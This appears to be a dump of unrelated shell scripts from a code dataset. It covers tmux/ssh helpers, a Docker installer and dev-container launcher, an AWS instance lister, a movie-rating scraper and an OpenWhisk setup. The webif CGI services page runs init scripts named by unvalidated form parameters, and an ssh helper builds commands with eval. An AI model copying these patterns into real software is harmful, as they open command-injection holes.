# ssh wrapper to set tmux window title
ssh() {
setopt RE_MATCH_PCRE
if [ -n "${TMUX_PANE}" ]; then
for p; do
if [[ "${p}" =~ '^([^ ]+@)?([a-zA-Z0-9](?:(?:[a-zA-Z0-9-]*|(?<!-)\.(?![-.]))*[a-zA-Z0-9]+)?)$' ]]; then
title="$(echo "${p}" | sed -r 's/^([^ ]+@)?(.+)$/\2/')"
break
fi
done
wt "${title}"
command ssh "$@"
wt
else
command ssh "$@"
fi
}
# invoke ssh and attach/create tmux session on remote host
tssh() {
# recognise a named session passed as the last argument
# this is crude, and means that:
# 1. the named session must be the last argument
# 2. if any other arguments other than the target host are passed, the session name must also be specified
# to be fixed up whenever there's nothing else to do
if [ -n "${2}" ]; then
SESSION_NAME="${@[-1]}"
SSH_ARGS="${@:1:-1}"
else
SESSION_NAME=tom
SSH_ARGS="${@}"
fi
CMD="ssh -t ${SSH_ARGS[*]} \"bash -l -c 'tmux at -t ${SESSION_NAME} || tmux new -s ${SESSION_NAME}'\""
eval $CMD
}
# use ssh completion for tssh function
compdef tssh=ssh
# print shell colours
shellcolors() {
for x in {0..8}; do
for i in {30..37}; do
for a in {40..47}; do
echo -ne "\e[$x;$i;$a""m\\\e[$x;$i;$a""m\e[0;37;40m "
done
echo
done
done
echo
}
# print the 256 colour palette
prettycolors() {
for code in {000..255}; do print -P -- "$code: %F{$code}Pretty%f"; done
}
# set a custom suffix for liquidprompt
prompt_env_suffix() {
if [ -n "${1}" ]; then
LP_PS1_POSTFIX=$'%{\e[0;34m%}{'"${*}"$'}%{\e[0m%} '
else
LP_PS1_POSTFIX=
fi
}
#function cd() {
# [[ "${SHELL}" =~ "zsh" ]] && emulate -LR zsh
# builtin cd $@
# result=$?
# last="${@:-1}"
# if [[ $result != 0 ]] && [[ "${last}" =~ "shits" ]]; then
# echo "Did you mean? ${last//shits/shifts}"
# fi
#}
_ENVRC=".envrc"
_ENVRC_SUMFILE="${HOME}/.envrc.md5"
chpwd() {
source_envrc
}
precmd() {
echo -ne "\033]0;${PWD/#${HOME}/~} \007"
}
source_envrc() {
[[ "${SHELL}" =~ "zsh" ]] && emulate -LR zsh
[[ -o interactive ]] || return 0
[[ "${ZSH_SUBSHELL}" != "0" ]] && return 0
rcfile="$(find_up "${_ENVRC}" "${PWD}")"
[[ -n "${_ENVRC_SOURCED}" ]] && if [[ "${_ENVRC_SOURCED}" != "${rcfile}" ]] || [[ -z "${rcfile}" ]]; then
echo $'\e[0;32mUnloading '"${_ENVRC_SOURCED}"'\e[0m'
if typeset -f "envrc_destroy" >/dev/null; then
envrc_destroy
unset -f envrc_destroy
fi
unset _ENVRC_SOURCED
fi
if [[ "${1}" == "reload" || ( -z "${_ENVRC_SOURCED}" && "${PWD}" != "${HOME}" && -r "${rcfile}" ) ]]; then
[[ -f "${_ENVRC_SUMFILE}" ]] || touch "${_ENVRC_SUMFILE}"
md5="$(_md5 "${rcfile}")"
if grep -q "^${md5}$" "${_ENVRC_SUMFILE}"; then
echo $'\e[0;32mSourcing '"${rcfile}"'\e[0m'
export _ENVRC_SOURCED=$rcfile
source "${rcfile}"
else
echo $'\e[0;31mUnknown '"${_ENVRC}"' found at '"${rcfile}"'. Run `envrc allow` to approve\e[0m' >&2
fi
fi
}
envrc() {
if [ -z "${2}" ]; then
_dir="${PWD}"
#rcfiles="$(find_up_all "${_ENVRC}" "${PWD}")"
rcfiles="$(find_up "${_ENVRC}" "${PWD}")"
else
_dir="$(\cd "${2%"${_ENVRC}"}" && pwd)"
rcfiles="${_dir}/${_ENVRC}"
fi
case "${1}" in
"allow")
while read -r rcfile; do
if [[ -n "${rcfile}" ]] && [[ -r "${rcfile}" ]]; then
vared -p "Allow ${rcfile}? [Y/n]: " -c confirm
if [[ "${confirm}" == "y" ]]; then
gsed -i '\| '"${rcfile}"'$|d' "${_ENVRC_SUMFILE}"
md5="$(_md5 "${rcfile}")"
echo "${md5}" >>"${_ENVRC_SUMFILE}"
echo $'\e[0;34mAllowed '"${rcfile}"'\e[0m'
fi
unset confirm
else
echo $'\e[0;31m'"${_ENVRC}"' not found at '"${_dir}"'\e[0m' >&2
return 1
fi
done <<<"${rcfiles}"
[[ "${_dir}" == "${PWD}" ]] && source_envrc reload
;;
"reload")
_ENVRC_SOURCED=
chpwd
;;
"revoke")
if sed -i '\| '"${rcfile}"'$|d' "${_ENVRC_SUMFILE}"; then
echo $'\e[0;34mRevoked '"${rcfile}"'\e[0m'
else
echo $'\e[0;31mError revoking '"${rcfile}"'\e[0m' >&2
fi
;;
esac
}
showcert() {
openssl s_client -connect ${1}:${2:-443} -servername ${1} -showcerts <<<"Q" | openssl x509 -text -noout
}
az_version() {
python_version="3.10.0"
version="${1}"
if [[ "${version}" == "" ]]; then
echo "No version specified!" >&2
echo "Available versions:" >&2
pyenv versions | grep "${python_version}/envs/azure-cli-" | sed "s,${python_version}/envs/azure-cli-\([0-9.]*\).*,\1," 1>&2
return 1
fi
new_pyenv_version="${python_version}/envs/azure-cli-${version}"
old_pyenv_version="$(pyenv version | cut -d' ' -f1)"
old_version="$(pyenv version | cut -d' ' -f1 | sed "s,${python_version}/envs/azure-cli-,,")"
#[[ "${new_pyenv_version}" == "${old_pyenv_version}" ]] && return 0
if [[ -d "${HOME}/.azure" ]]; then
old_config_version="null"
[[ -r "${HOME}/.azure/versionCheck.json" ]] && old_config_version="$(jq -r '.versions["azure-cli"].local' <"${HOME}/.azure/versionCheck.json")"
if [[ "${old_config_version}" == "null" ]]; then
mv "${HOME}/.azure" "${HOME}/.azure-${old_config_version}"
else
mv "${HOME}/.azure" "${HOME}/.azure-${old_version}"
fi
fi
pyenv versions | grep -q "${new_pyenv_version}" || pyenv virtualenv "${python_version}" "azure-cli-${version}"
pyenv local "${new_pyenv_version}"
pip list 2>/dev/null | grep -q "azure-cli" || pip install azure-cli==${version}
rehash
[[ -d "${HOME}/.azure-${version}" ]] && mv "${HOME}/.azure-${version}" "${HOME}/.azure"
az version
}
# vim: set ft=zsh ts=2 sts=2 sw=2 et:
| true
|
50393fce42f33f00d03b4c85cd5ed0d26172663c
|
Shell
|
FlorianTolk/Dockerized-CouchDB-Standup
|
/install.sh
|
UTF-8
| 1,316
| 4.0625
| 4
|
[] |
no_license
|
#!/bin/bash
# Simple script to install Docker
function announce() {
echo ""
echo "#====================================================#"
echo "#"
echo "# Installing $1"
echo "#"
echo "#====================================================#"
}
# Check for sudo
#
if [ "$EUID" -ne 0 ]
then announce "Please run as root!"
exit
fi
# Curl
#
announce "Curl"
if ! [ -x "$(command -v curl)" ]; then
# Curl is easy
apt-get install curl
else
echo "Skipping, Curl already installed!"
fi
# Docker
#
announce "Docker"
if ! [ -x "$(command -v docker)" ]; then
# Docker is a bit complicated
#
# Add the GPG Key
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
# Add the Docker repository to our APT sources
add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
# With those added, update our packages
apt-get update
# Since we're up to date, get docker
apt-get install -y docker-ce
else
echo "Skipping, docker already installed!"
fi
echo "Docker should all be ready."
echo ""
while true; do
read -p "Do you wish to intialize couchDB? <Y/N>" yn
case $yn in
[Yy]* ) bash ./startDocker.sh; break;;
[Nn]* ) exit;;
* ) echo "Please answer using y or n.";;
esac
done
| true
|
65e70b202598b3c2daa888bf9f4c89c01211b3f0
|
Shell
|
guozhan1722/SomeOldSrcCode
|
/webif/files/www/cgi-bin/webif/system-services.sh
|
UTF-8
| 4,642
| 3.171875
| 3
|
[] |
no_license
|
#!/usr/bin/webif-page
<%
. /usr/lib/webif/webif.sh
###################################################################
# Services
#
# Description:
# Services control page.
# This page enables the user to enable/disabled/start
# and stop the services in the directory /etc/init.d
#
# Author(s) [in order of work date]:
# m4rc0 <jansssenmaj@gmail.com>
#
# Major revisions:
# 2008-11-08 - Initial release
#
# Configuration files referenced:
# none
#
# Required components:
#
header "System" "Services" "@TR<<Services>>" '' "$SCRIPT_NAME"
# change rowcolors
get_tr() {
if equal "$cur_color" "odd"; then
cur_color="even"
echo "<tr>"
else
cur_color="odd"
echo "<tr class=\"odd\">"
fi
}
#check if a service with an action is selected
if [ "$FORM_service" != "" ] && [ "$FORM_action" != "" ]; then
/etc/init.d/$FORM_service $FORM_action > /dev/null 2>&1
fi
cat <<EOF
<h3><strong>@TR<<Available services>></strong></h3>
<table style="width: 90%; margin-left: 2.5em; text-align: left; font-size: 0.8em;" border="0" cellpadding="2" cellspacing="1" summary="@TR<<Services>>">
<tr>
<td>
<table style="margin-left: 2.5em; text-align: left;" border="0" cellpadding="2" cellspacing="1" summary="@TR<<Services>>">
EOF
# set the color-switch
cur_color="odd"
#for each service in init.d.....
for service in $(ls /etc/init.d | grep -v "rcS") ; do
# select the right color
get_tr
#check if current $service is in the rc.d list
if [ -x /etc/rc.d/S??${service} -o -x /etc/rc.d/K??${service} ] ; then
echo "<td><img width=\"17\" src=\"/images/service_enabled.png\" alt=\"Service Enabled\" /></td>"
else
echo "<td><img width=\"17\" src=\"/images/service_disabled.png\" alt=\"Service Disabled\" /></td>"
fi
cat <<EOF
<td> </td>
<td>${service}</td>
<td><img height="1" width="100" src="/images/pixel.gif" alt="" /></td>
<td><a href="system-services.sh?service=${service}&action=enable"><img width="13" src="/images/service_enable.png" alt="Enable Service" /></a></td>
<td valign="middle"><a href="system-services.sh?service=${service}&action=enable">@TR<<system_services_service_enable#Enable>></a></td>
<td><img height="1" width="5" src="/images/pixel.gif" alt="" /></td>
<td><a href="system-services.sh?service=${service}&action=disable"><img width="13" src="/images/service_disable.png" alt="Disable Service" /></a></td>
<td valign="middle"><a href="system-services.sh?service=${service}&action=disable">@TR<<system_services_service_disable#Disable>></a></td>
<td><img height="1" width="60" src="/images/pixel.gif" alt="" /></td>
<td><a href="system-services.sh?service=${service}&action=start"><img width="13" src="/images/service_start.png" alt="Start Service" /></a></td>
<td valign="middle"><a href="system-services.sh?service=${service}&action=start">@TR<<system_services_sevice_start#Start>></a></td>
<td><img height="1" width="5" src="/images/pixel.gif" alt="" /></td>
<td><a href="system-services.sh?service=${service}&action=restart"><img width="13" src="/images/service_restart.png" alt="Restart Service" /></a></td>
<td valign="middle"><a href="system-services.sh?service=${service}&action=restart">@TR<<system_services_service_restart#Restart>></a></td>
<td><img height="1" width="5" src="/images/pixel.gif" alt="" /></td>
<td><a href="system-services.sh?service=${service}&action=stop"><img width="13" src="/images/service_stop.png" alt="Stop Service" /></a></td>
<td valign="middle"><a href="system-services.sh?service=${service}&action=stop">@TR<<system_services_service_stop#Stop>></a></td>
</tr>
EOF
done
cat <<EOF
</table>
</td>
<td valign="top">
<table style="margin-left: 2.5em; text-align: left;" border="0" cellpadding="2" cellspacing="1" summary="@TR<<Services>>">
<tr>
<td><img width="17" src="/images/service_enabled.png" alt="Service Enabled" /></td>
<td>@TR<<system_services_service_enabled#Service Enabled>></td>
</tr>
<tr>
<td><img width="17" src="/images/service_disabled.png" alt="Service Disabled" /></td>
<td>@TR<<system_services_service_disabled#Service Disabled>></td>
</tr>
<tr><td colspan="2"> </td></tr>
EOF
#if there is a service and an action selected... display status
if [ "$FORM_service" != "" ] && [ "$FORM_action" != "" ]; then
case "$FORM_action" in
enable) status="enabled";;
disable) status="disabled";;
start) status="started";;
restart) status="restarted";;
stop) status="stopped";;
esac
cat <<EOF
<tr>
<td colspan="2">
<strong>Service ${FORM_service} was ${status}</strong>
</td>
</tr>
EOF
fi
cat <<EOF
</table>
</td>
</tr>
</table>
EOF
footer %>
#<!--
###WEBIF:name:System:140:Services
#-->
| true
|
973ead8ac3a2034b22d13a6648d45e45c8908f37
|
Shell
|
AnuvrathElastica/scaling-enigma
|
/monitor/build_docker_image.sh
|
UTF-8
| 196
| 3.25
| 3
|
[] |
no_license
|
#!/bin/bash
set -e
IMAGE_NAME=`basename $PWD`
if [ -z $1 ] ; then
ELASTICA_VERSION="latest"
else
ELASTICA_VERSION="$1"
fi
sudo docker build --rm . -t "${IMAGE_NAME}":"${ELASTICA_VERSION}"
| true
|
9910e348fd8c27e7dea13279c01b89c73fb41b90
|
Shell
|
shwaka/kotlin-publish
|
/install.sh
|
UTF-8
| 169
| 2.671875
| 3
|
[] |
no_license
|
#! /bin/bash
for d in example-lib example-mplib; do
(
echo "--- Install $d ---"
cd $d
./gradlew publishToMavenLocal
echo
)
done
| true
|
53d4bbb4f4642792a5501a78e63f27d18c7de7e9
|
Shell
|
lSoleyl/linux_utils
|
/lib/require-lib.sh
|
UTF-8
| 570
| 4.1875
| 4
|
[] |
no_license
|
#!/bin/bash
# A small script, which checks whether a binary is present and if not,
# prompts the user to install it
# Usage require-lib.sh <binary> [packetname (if different)]
if [ -z $1 ]; then
echo "Usage: $(basename $0) <binary> [packetname (if different)]"
else
program=$1
[ -z $2 ] && packet=$program || packet=$2
which $program > /dev/null && exit 0 # Quit program if packet exists
read -p "Packet $packet is missing, should it be installed now? (y/n)" yn
if [ $yn == "y" ]; then
sudo apt-get install $packet
exit $?
fi
exit 1
fi
| true
|
336190aaa4316dc07eb1c990363a3cd4a89297b4
|
Shell
|
nielsbasjes/yauaa
|
/start-docker.sh
|
UTF-8
| 5,532
| 3.65625
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
#
# Yet Another UserAgent Analyzer
# Copyright (C) 2013-2023 Niels Basjes
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null && pwd )"
echo "PWD: ${SCRIPTDIR}"
cd "${SCRIPTDIR}" || ( echo "This should not be possible" ; exit 1 )
PROJECTNAME=yauaa
USER=$(id -un)
CONTAINER_NAME=${PROJECTNAME}-devtools-${USER}-$$
DOCKER_BUILD="docker build"
if [ -n "${INSIDE_DOCKER+x}" ];
then
echo "Nothing to do: You are already INSIDE the docker environment"
exit 1;
fi
if [[ "$(docker images -q ${PROJECTNAME}-devtools 2> /dev/null)" == "" ]]; then
# DOCKER_BUILD="docker build"
cat << "Welcome-message"
_____ _ _ _ _ _
/ ___| | | | | (_) (_) | |
\ `--. ___| |_| |_ _ _ __ __ _ _ _ _ __ ___ _ ____ ___ _ __ ___ _ __ _ __ ___ ___ _ __ | |_
`--. \/ _ \ __| __| | '_ \ / _` | | | | | '_ \ / _ \ '_ \ \ / / | '__/ _ \| '_ \| '_ ` _ \ / _ \ '_ \| __|
/\__/ / __/ |_| |_| | | | | (_| | | |_| | |_) | | __/ | | \ V /| | | | (_) | | | | | | | | | __/ | | | |_
\____/ \___|\__|\__|_|_| |_|\__, | \__,_| .__/ \___|_| |_|\_/ |_|_| \___/|_| |_|_| |_| |_|\___|_| |_|\__|
__/ | | |
|___/ |_|
For building Yet Another UserAgent Analyzer
This will take a few minutes...
Welcome-message
else
# DOCKER_BUILD="docker build -q"
echo "Loading Yauaa development environment"
fi
${DOCKER_BUILD} -t ${PROJECTNAME}-devtools devtools/docker/
buildStatus=$?
if [ ${buildStatus} -ne 0 ];
then
echo "Building the docker image failed."
exit ${buildStatus}
fi
if [ "$(uname -s)" == "Linux" ]; then
USER_NAME=${SUDO_USER:=${USER}}
USER_ID=$(id -u "${USER_NAME}")
GROUP_ID=$(id -g "${USER_NAME}")
else # boot2docker uid and gid
USER_NAME=${USER}
USER_ID=1000
GROUP_ID=50
fi
EXTRA_DOCKER_STEPS=""
if [ -f "${HOME}/.gitconfig" ];
then
cp "${HOME}/.gitconfig" ___git_config_for_docker
EXTRA_DOCKER_STEPS="ADD ___git_config_for_docker /home/${USER}/.gitconfig"
fi
DOCKER_GROUP_ID=$(getent group docker | cut -d':' -f3)
cat - > ___UserSpecificDockerfile << UserSpecificDocker
FROM ${PROJECTNAME}-devtools
RUN bash /scripts/configure-for-user.sh "${USER_NAME}" "${USER_ID}" "${GROUP_ID}" "$(grep -F vboxsf /etc/group)"
#RUN groupmod -g ${DOCKER_GROUP_ID} docker
${EXTRA_DOCKER_STEPS}
UserSpecificDocker
${DOCKER_BUILD} -t "${PROJECTNAME}-devtools-${USER_NAME}" -f ___UserSpecificDockerfile .
buildStatus=$?
if [ ${buildStatus} -ne 0 ];
then
echo "Building the user specific docker image failed."
exit ${buildStatus}
fi
rm -f ___git_config_for_docker ___UserSpecificDockerfile
echo ""
echo "Docker image build completed."
echo "=============================================================================================="
echo ""
# Do NOT Map the real ~/.m2 directory !!!
[ -d "${PWD}/devtools/docker/_m2" ] || mkdir "${PWD}/devtools/docker/_m2"
[ -d "${PWD}/devtools/docker/_gnupg" ] || mkdir "${PWD}/devtools/docker/_gnupg"
MOUNTGPGDIR="${PWD}/devtools/docker/_gnupg"
if [[ "${1}" == "RELEASE" ]];
then
cp "${HOME}"/.m2/*.xml "${PWD}/devtools/docker/_m2"
MOUNTGPGDIR="${HOME}/.gnupg"
echo "Setting up for release process"
fi
DOCKER_INTERACTIVE_RUN=${DOCKER_INTERACTIVE_RUN-"-i -t"}
DOCKER_SOCKET_MOUNT=""
if [ -S /var/run/docker.sock ];
then
DOCKER_SOCKET_MOUNT="-v /var/run/docker.sock:/var/run/docker.sock${V_OPTS:-}"
echo "Enabling Docker support with the docker build environment."
else
echo "There is NO Docker support with the docker build environment."
fi
COMMAND=( "$@" )
if [ $# -eq 0 ];
then
COMMAND=( "bash" "-i" )
DOCKER_INTERACTIVE="-i -t"
else
DOCKER_INTERACTIVE="-i"
fi
# man docker-run
# When using SELinux, mounted directories may not be accessible
# to the container. To work around this, with Docker prior to 1.7
# one needs to run the "chcon -Rt svirt_sandbox_file_t" command on
# the directories. With Docker 1.7 and later the z mount option
# does this automatically.
# Since Docker 1.7 was release 5 years ago we only support 1.7 and newer.
V_OPTS=:z
docker run --rm=true ${DOCKER_INTERACTIVE} \
-u "${USER_NAME}" \
-v "${PWD}:/home/${USER_NAME}/${PROJECTNAME}${V_OPTS:-}" \
-v "${HOME}/.m2:/home/${USER_NAME}/.m2${V_OPTS:-}" \
-v "${PWD}/devtools/docker/toolchains.xml:/home/${USER_NAME}/.m2/toolchains.xml" \
-v "${MOUNTGPGDIR}:/home/${USER_NAME}/.gnupg${V_OPTS:-}" \
${DOCKER_SOCKET_MOUNT} \
-w "/home/${USER}/${PROJECTNAME}" \
-p 1313:1313 \
--name "${CONTAINER_NAME}" \
"${PROJECTNAME}-devtools-${USER_NAME}" \
"${COMMAND[@]}"
exit 0
| true
|
cd40086342ecaa021b251e109d848b794caac36f
|
Shell
|
angelo-malatacca/AWS-Utility-Scripts
|
/ec2-check.sh
|
UTF-8
| 1,006
| 3.171875
| 3
|
[] |
no_license
|
#!/bin/bash
echo ""
echo "This script show you all the instances"
echo "in all the AWS available regions"
echo ""
for region in `aws ec2 describe-regions --output text | cut -f4`
do
echo -e "\nListing Instances in region: $region:"
echo "first check:..."
aws ec2 describe-instances --region $region | jq '.Reservations[] | ( .Instances[] | {state: .State.Name, "Launch time": .LaunchTime, Name: .Tags[].Value, "Instance Id": .InstanceId, "InstanceType": .InstanceType, Key: .KeyName, "Availability zone": .Placement.AvailabilityZone, "Private IP": .PrivateIpAddress, "Public Ip": .PublicIpAddress})'
# it there is no tag:
echo "second check:..."
aws ec2 describe-instances --region $region | jq '.Reservations[] | ( .Instances[] | {state: .State.Name, "Launch time": .LaunchTime, "Instance Id": .InstanceId, "InstanceType": .InstanceType, Key: .KeyName, "Availability zone": .Placement.AvailabilityZone, "Private IP": .PrivateIpAddress, "Public Ip": .PublicIpAddress})'
done
| true
|
08d27a3b89cb37f378a5ca7dcbb01016e56952c6
|
Shell
|
shovonis/IdeaProject
|
/therap_training/movies/movie.sh
|
UTF-8
| 1,164
| 2.625
| 3
|
[] |
no_license
|
#clearing the shell
clear
#movielist
ls -d */ > movielist
rm -fr ratings.html
echo "<head>
<style>
#customers
{
font-family:"Trebuchet MS", Arial, Helvetica, sans-serif;
width:100%;
border-collapse:collapse;
}
#customers td, #customers th
{
font-size:1em;
border:1px solid #98bf21;
padding:3px 7px 2px 7px;
}
#customers th
{
font-size:1.1em;
text-align:left;
padding-top:5px;
padding-bottom:4px;
background-color:#A7C942;
color:#ffffff;
}
#customers tr.alt td
{
color:#000000;
background-color:#EAF2D3;
}
</style>
</head>
<body>
" >> ratings.html
echo "<table id="customers">
<tr>
<th>Movies</th>
<th>Ratings</th>
</tr>" >> ratings.html
while read line
do
echo "<tr class="alt">" >> ratings.html
wget -O search_result.html -o tmp --user-agent Mozilla "http://www.google.ca/search?q=${line}"
echo "<td><a href=\"`pwd`/$line\">$line</a></td>" >> ratings.html
echo "<td>" >> ratings.html
grep -i -o "Rating:[ ][0-9][.]*[0-9]*[/][0-9][0-9]" search_result.html | cut -b 9-14 >> ratings.html
echo "</td>" >> ratings.html
echo "</tr>" >> ratings.html
done < movielist
echo "</table>
</body>
</html>" >> ratings.html
| true
|
d9e299c383d2977c277b26fa23dbba59b0f75618
|
Shell
|
adadgio/deploy
|
/clean.sh
|
UTF-8
| 2,144
| 3.765625
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# Bash deploy script. Copyright (c) 2017 Romain Bruckert
# https://kvz.io/blog/2013/11/21/bash-best-practices/
###
# Check input arguments
##
if [ -z "${ENV}" ]; then
echo -e "${red}✗ No argument supplied for environment (-e|--env|--environment)${nc}"
exit 1
fi
if [ -z "${VERSION}" ]; then
echo -e "${red}✗ No argument supplied for version (-v|--version)${nc}"
exit 1
fi
echo -e "${green}★ Starting cleaning util${nc}"
###
# Check input arguments
##
if [ -z "${ENV}" ]; then
echo -e "${red}✗ No argument supplied for environment (-e|--env|--environment)${nc}"
exit 1
fi
if [ -z "${VERSION}" ]; then
echo -e "${red}✗ No argument supplied for version (-v|--version)${nc}"
exit 1
fi
if [ -z "${DEBUG}" ]; then
DEBUG='--no-debug'
fi
echo "DEPRECATED"
exit 2
#
# REMOTE_VERSION_NUMBER=$(ssh ${CNF_USER}@${CNF_HOST} "cat ${CNF_BASE_REMOTE_DIR}/${LIVEDIR}/.version.${ENV}")
#
# # Makee sur deploying a same version is allowed (ask the developer)
# if [ ${VERSION} = ${REMOTE_VERSION_NUMBER} ]; then
# echo -e "${red}✗ Cant remove a live version${nc}"
# exit 0
# else
#
# ###
# # First list version directories to be sure...
# ##
# echo -e "${green}★ Listing remote directories for your information${nc}"
# ssh -t ${CNF_USER}@${CNF_HOST} "cd ${CNF_BASE_REMOTE_DIR} && tree -L 1"
#
# ###
# # Set remote dir to delete
# ###
# REMOTE_VERSION_DIR_TO_REMOVE=${CNF_BASE_REMOTE_DIR}/version-${VERSION}
#
# read -r -p " ♘ Are you sure you want to remove ${REMOTE_VERSION_DIR_TO_REMOVE}? [y/N] " response
# if [[ ${response} =~ ^([yY][eE][sS]|[yY])$ ]]
# then
#
# echo -e "${blue}★ Preparing to remove${nc}"
# echo -e " ✓ Removing directory ${REMOTE_VERSION_DIR_TO_REMOVE}"
# ssh -t ${CNF_USER}@${CNF_HOST} "rm -rf ${REMOTE_VERSION_DIR_TO_REMOVE}" > /dev/null 2>&1
# echo -e " ✓ Directory removed"
#
# ssh -t ${CNF_USER}@${CNF_HOST} "cd ${CNF_BASE_REMOTE_DIR} && tree -L 1"
#
# exit 0
#
# else
# echo -e "${red}✗ Canceled${nc}"
# exit 0
# fi
#
# fi
| true
|
a7f66cc147d9ba5bbe229ce2b00713d52bb2ca77
|
Shell
|
jensp/Arch-Linux-on-i586
|
/core/filesystem/profile
|
UTF-8
| 1,445
| 3.359375
| 3
|
[] |
no_license
|
#
# /etc/profile
#
# This file is intended to be used for ALL common
# Bourne-compatible shells. Shell specifics should be
# handled in /etc/profile.$SHELL where $SHELL is the name
# of the binary being run (discounting symlinks)
#
# Sections taken from SuSe's /etc/profile
# Note the explicit use of 'test' to cover all bases
# and potentially incompatible shells
#Determine our shell without using $SHELL, which may lie
shell="sh"
if test -f /proc/mounts; then
case $(/bin/ls -l /proc/$$/exe) in
*bash) shell=bash ;;
*dash) shell=dash ;;
*ash) shell=ash ;;
*ksh) shell=ksh ;;
*zsh) shell=zsh ;;
esac
fi
# Load shell specific profile settings
test -f "/etc/profile.$shell" && . "/etc/profile.$shell"
#Set our umask
umask 022
# Set our default path
PATH="/bin:/usr/bin:/sbin:/usr/sbin"
export PATH
# Export default pkg-config path
PKG_CONFIG_PATH="/usr/lib/pkgconfig"
export PKG_CONFIG_PATH
# Some readline stuff that is fairly common
HISTSIZE=1000
HISTCONTROL="erasedups"
INPUTRC="/etc/inputrc"
LESS="-R"
LC_COLLATE="C"
export HISTSIZE HISTCONTROL INPUTRC LESS LC_COLLATE
# Load profiles from /etc/profile.d
if test -d /etc/profile.d/; then
for profile in /etc/profile.d/*.sh; do
test -x $profile && . $profile
done
unset profile
fi
# Termcap is outdated, old, and crusty, kill it.
unset TERMCAP
# Man is much better than us at figuring this out
unset MANPATH
| true
|
113a98de84588f47893ab6d99d9285d13792956f
|
Shell
|
litti/dccu2
|
/x86_32_debian_all/bin/setlgwkey.sh
|
UTF-8
| 1,075
| 3.59375
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# list all keychange files
UPDATEFILES="/etc/config/*.keychange"
# perform key exchange for every keychange file
if [ -f $UPDATEFILES ]
then
for F in `ls $UPDATEFILES`
do
echo "Processing update file $F"
#parse the file
SERIAL=`cat $F | grep Serial | sed s/Serial=//`
IP=`cat $F | grep IP | sed s/IP=//`
KEY=`cat $F | grep KEY | sed s/KEY=//`
CURKEY=`cat $F | grep CURKEY | sed s/CURKEY=//`
CLASS=`cat $F | grep Class | sed s/Class=//`
#Check gateway class and set rfd.conf / hs485d.conf path
if [ "$CLASS" == "Wired" ]
then
#Wired
CONFFILE=/etc/config/hs485d.conf
elif [ "$CLASS" == "RF" ]
then
#RF
CONFFILE=/etc/config/rfd.conf
else
exit 1
fi
#Start key exchange
if [ "$IP" == "" ]
then
#echo "Using Serial"
eq3configcmd setlgwkey -s $SERIAL -c $CURKEY -n $KEY -f $CONFFILE -l 1
else
#echo "Using IP"
eq3configcmd setlgwkey -s $SERIAL -h $IP -c $CURKEY -n $KEY -f $CONFFILE -l 1
fi
# On success delete key exchange file
if [ $? -eq 0 ]
then
rm -f $F
fi
done
fi
| true
|
fdfb9ac629f272132af7438e76440bb8d45937cf
|
Shell
|
paulcastro/dinkum
|
/whiskPackage.sh
|
UTF-8
| 1,313
| 3.296875
| 3
|
[] |
no_license
|
#!/bin/sh
source local.env
PAYLOAD=$(<payload.json)
function uninstall() {
echo "Disabling rule"
wsk rule disable backupFromTrigger
echo "Deleting trigger"
wsk trigger delete backupTrigger
echo "Updating actions"
wsk action delete getApiToken
wsk action delete getServers
wsk action delete createBackup
wsk action delete authorizedBackup
echo "creating rules"
wsk rule delete backupFromTrigger
}
function install() {
echo "Creating trigger feed"
wsk trigger create backupTrigger --feed /whisk.system/alarms/alarm -p cron '0 0 23 * * *' -p trigger_payload '$PAYLOAD'
echo "Creating actions"
wsk action create getApiToken getApiToken.js -p host $IDENTITY_HOST -p port $IDENTITY_PORT -p endpointName $ENDPOINT_NAME -p userId $USERID -p password $PASSWORD -p projectId $PROJECT_ID
wsk action create getServers getServers.js
wsk action create createBackup createBackup.js
wsk action create --sequence authorizedBackup getApiToken,getServers,createBackup
echo "creating rules"
wsk rule create --enable backupFromTrigger backupTrigger authorizedBackup
}
function usage() {
echo 'whiskPackage.sh with options --install, --uninstall, --update'
}
case "$1" in
"--install" )
install
;;
"--uninstall" )
uninstall
;;
* )
usage
;;
esac
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.